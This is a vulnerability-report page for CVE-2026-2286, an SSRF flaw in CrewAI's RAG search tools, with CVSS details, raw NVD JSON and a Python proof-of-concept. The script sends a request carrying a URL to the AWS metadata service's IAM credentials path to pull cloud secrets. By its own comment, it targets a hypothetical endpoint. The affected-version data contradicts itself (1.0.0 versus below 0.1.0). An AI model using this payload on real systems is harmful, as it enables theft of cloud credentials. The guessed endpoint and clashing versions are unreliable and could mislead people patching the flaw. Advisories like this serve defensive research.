Security Vulnerability Report
中文
CVE-2026-2286 CVSS 9.8 CRITICAL

CVE-2026-2286

Published: 2026-03-30 16:16:05
Last Modified: 2026-04-15 13:36:46
Source: [email protected]

Description

CrewAI contains a server-side request forgery vulnerability that enables content acquisition from internal and cloud services, facilitated by the RAG search tools not properly validating URLs provided at runtime.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:crewai:crewai:1.0.0:*:*:*:*:*:*:* - VULNERABLE
CrewAI < 0.1.0 (具体受影响版本请参考官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ PoC for CVE-2026-2286 (CrewAI SSRF) This script demonstrates how a malicious URL can be sent to the vulnerable RAG tool. """ import requests target_url = "http://target-crewai-instance:8000/api/rag/search" # Hypothetical endpoint # Payload targeting internal metadata (AWS example) payload_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" data = { "query": "test", "url": payload_url # Malicious internal URL } try: response = requests.post(target_url, json=data) if response.status_code == 200: print("[+] SSRF Successful! Response from internal service:") print(response.text) else: print("[-] Request failed or filtered.") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-2286", "sourceIdentifier": "[email protected]", "published": "2026-03-30T16:16:04.777", "lastModified": "2026-04-15T13:36:46.303", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CrewAI contains a server-side request forgery vulnerability that enables content acquisition from internal and cloud services, facilitated by the RAG search tools not properly validating URLs provided at runtime."}, {"lang": "es", "value": "CrewAI contiene una vulnerabilidad de falsificación de petición del lado del servidor que permite la adquisición de contenido de servicios internos y en la nube, facilitada por las herramientas de búsqueda RAG que no validan correctamente las URL proporcionadas en tiempo de ejecución."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:crewai:crewai:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "3DC9BCCB-78E5-4D50-9EAD-6F54EB4E3153"}]}]}], "references": [{"url": "https://www.kb.cert.org/vuls/id/221883", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.